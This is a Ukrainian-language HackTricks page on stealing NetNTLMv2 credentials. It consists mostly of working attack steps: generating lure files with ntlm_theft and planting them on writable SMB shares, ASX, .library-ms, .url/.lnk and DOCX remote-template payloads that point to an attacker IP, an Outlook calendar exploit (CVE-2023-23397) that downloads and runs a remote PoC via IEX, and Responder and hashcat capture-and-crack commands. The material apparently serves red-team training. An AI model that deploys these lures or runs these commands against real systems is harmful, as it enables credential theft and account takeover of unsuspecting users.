Місця для викрадення NTLM creds

Tip

Вивчайте та практикуйте AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Вивчайте та практикуйте Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Підтримайте HackTricks

Перегляньте всі чудові ідеї з https://osandamalith.com/2017/03/24/places-of-interest-in-stealing-netntlm-hashes/ — від завантаження Microsoft Word файлу онлайн до джерела ntlm leaks: https://github.com/soufianetahiri/TeamsNTLMLeak/blob/main/README.md та https://github.com/p0dalirius/windows-coerced-authentication-methods

Записуваний SMB share + Explorer-triggered UNC lures (ntlm_theft/SCF/LNK/library-ms/desktop.ini)

Якщо ви можете записувати у share, який користувачі або планові задачі переглядають у Explorer, помістіть файли, чиї метадані вказують на ваш UNC (наприклад, \\ATTACKER\share). Відображення папки викликає implicit SMB authentication і leaks a NetNTLMv2 to your listener.

  1. Генеруйте lures (покриває SCF/URL/LNK/library-ms/desktop.ini/Office/RTF/etc.)
git clone https://github.com/Greenwolf/ntlm_theft && cd ntlm_theft
uv add --script ntlm_theft.py xlsxwriter
uv run ntlm_theft.py -g all -s <attacker_ip> -f lure
  1. Помістити їх у доступну для запису спільну папку (будь-яку папку, яку відкриває жертва):
smbclient //victim/share -U 'guest%'
cd transfer\
prompt off
mput lure/*
  1. Listen and crack:
sudo responder -I <iface>          # capture NetNTLMv2
hashcat hashes.txt /opt/SecLists/Passwords/Leaked-Databases/rockyou.txt  # autodetects mode 5600

Windows може опитувати кілька файлів одночасно; будь-які елементи, які переглядає Explorer (BROWSE TO FOLDER), не потребують кліків.

Windows Media Player playlists (.ASX/.WAX)

Якщо ви змусите ціль відкрити або переглянути Windows Media Player playlist під вашим контролем, ви можете leak Net‑NTLMv2, вказавши запис на UNC path. WMP спробує завантажити вказане медіа через SMB і автоматично автентифікується.

Приклад payload:

<asx version="3.0">
<title>Leak</title>
<entry>
<title></title>
<ref href="file://ATTACKER_IP\\share\\track.mp3" />
</entry>
</asx>

Потік збору та зламу:

# Capture the authentication
sudo Responder -I <iface>

# Crack the captured NetNTLMv2
hashcat hashes.txt /opt/SecLists/Passwords/Leaked-Databases/rockyou.txt

ZIP-embedded .library-ms NTLM leak (CVE-2025-24071/24055)

Windows Explorer ненадійно обробляє файли .library-ms, коли їх відкривають безпосередньо з ZIP-архіву. Якщо визначення бібліотеки вказує на віддалений UNC-шлях (наприклад, \attacker\share), просте переглядання або запуск .library-ms всередині ZIP змушує Explorer звертатися до UNC і відправляти NTLM-аутентифікаційні дані на сторону атакуючого. Це дає NetNTLMv2, який можна зламати офлайн або потенційно ретранслювати.

Мінімальний .library-ms, що вказує на UNC атакуючого

<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
<version>6</version>
<name>Company Documents</name>
<isLibraryPinned>false</isLibraryPinned>
<iconReference>shell32.dll,-235</iconReference>
<templateInfo>
<folderType>{7d49d726-3c21-4f05-99aa-fdc2c9474656}</folderType>
</templateInfo>
<searchConnectorDescriptionList>
<searchConnectorDescription>
<simpleLocation>
<url>\\10.10.14.2\share</url>
</simpleLocation>
</searchConnectorDescription>
</searchConnectorDescriptionList>
</libraryDescription>

Операційні кроки

  • Створіть файл .library-ms з наведеним вище XML (вкажіть ваш IP/hostname).
  • Запакуйте його в ZIP (на Windows: Send to → Compressed (zipped) folder) і передайте ZIP цілі.
  • Запустіть NTLM capture listener і чекайте, поки жертва відкриє .library-ms зсередини ZIP.

Шлях звуку нагадування календаря Outlook (CVE-2023-23397) – zero‑click Net‑NTLMv2 leak

Microsoft Outlook for Windows обробляв розширену MAPI-властивість PidLidReminderFileParameter у елементах календаря. Якщо ця властивість вказувала на UNC шлях (e.g., \attacker\share\alert.wav), Outlook підключався до SMB share, коли спрацьовувало нагадування, внаслідок чого відбувався leak Net‑NTLMv2 користувача без жодного кліку. Це було виправлено 14 березня 2023 року, але залишається дуже релевантним для застарілих або неоновлених систем і для історичного incident response.

Quick exploitation with PowerShell (Outlook COM):

# Run on a host with Outlook installed and a configured mailbox
IEX (iwr -UseBasicParsing https://raw.githubusercontent.com/api0cradle/CVE-2023-23397-POC-Powershell/main/CVE-2023-23397.ps1)
Send-CalendarNTLMLeak -recipient user@example.com -remotefilepath "\\10.10.14.2\share\alert.wav" -meetingsubject "Update" -meetingbody "Please accept"
# Variants supported by the PoC include \\host@80\file.wav and \\host@SSL@443\file.wav

Сторона Listener:

sudo responder -I eth0  # or impacket-smbserver to observe connections

Примітки

  • Жертві потрібно лише, щоб Outlook for Windows був запущений у момент спрацювання нагадування.
  • Цей leak дає Net‑NTLMv2, придатний для offline cracking or relay (not pass‑the‑hash).

.LNK/.URL icon-based zero‑click NTLM leak (CVE‑2025‑50154 – обхід CVE‑2025‑24054)

Windows Explorer автоматично відображає іконки ярликів. Нещодавні дослідження показали, що навіть після патча Microsoft від квітня 2025 для UNC‑icon shortcuts все ще можна було спричинити NTLM аутентифікацію без кліків, розмістивши ціль ярлика на UNC path і залишивши іконку локально (обхід патча отримав CVE‑2025‑50154). Простий перегляд папки змушує Explorer отримати метадані з віддаленої цілі, відправляючи NTLM на attacker SMB server.

Мінімальний Internet Shortcut payload (.url):

[InternetShortcut]
URL=http://intranet
IconFile=\\10.10.14.2\share\icon.ico
IconIndex=0

Payload програмного ярлика (.lnk) через PowerShell:

$lnk = "$env:USERPROFILE\Desktop\lab.lnk"
$w = New-Object -ComObject WScript.Shell
$sc = $w.CreateShortcut($lnk)
$sc.TargetPath = "\\10.10.14.2\share\payload.exe"  # remote UNC target
$sc.IconLocation = "C:\\Windows\\System32\\SHELL32.dll" # local icon to bypass UNC-icon checks
$sc.Save()

Ідеї доставки

  • Помістіть ярлик у ZIP і змусьте жертву відкрити його.
  • Розмістіть ярлик на записуваному мережевому шарі, який жертва відкриє.
  • Поєднайте з іншими файлами-приманками в тій же папці, щоб Explorer попередньо переглядав елементи.

Office remote template injection (.docx/.dotm) to coerce NTLM

Office документи можуть посилатися на зовнішній template. Якщо ви вкажете прикріплений template як UNC path, відкриття документа спричинить аутентифікацію до SMB.

Minimal DOCX relationship changes (inside word/):

  1. Відредагуйте word/settings.xml і додайте посилання на прикріплений template:
<w:attachedTemplate r:id="rId1337" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"/>
  1. Відредагуйте word/_rels/settings.xml.rels і вкажіть rId1337 на ваш UNC:
<Relationship Id="rId1337" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="\\\\10.10.14.2\\share\\template.dotm" TargetMode="External" xmlns="http://schemas.openxmlformats.org/package/2006/relationships"/>
  1. Перепакуйте у .docx і доставте. Запустіть ваш SMB capture listener і зачекайте на відкриття.

Для post-capture ідей щодо relaying або abusing NTLM, див.:

HackTricks

Посилання

Tip

Вивчайте та практикуйте AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Вивчайте та практикуйте Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Підтримайте HackTricks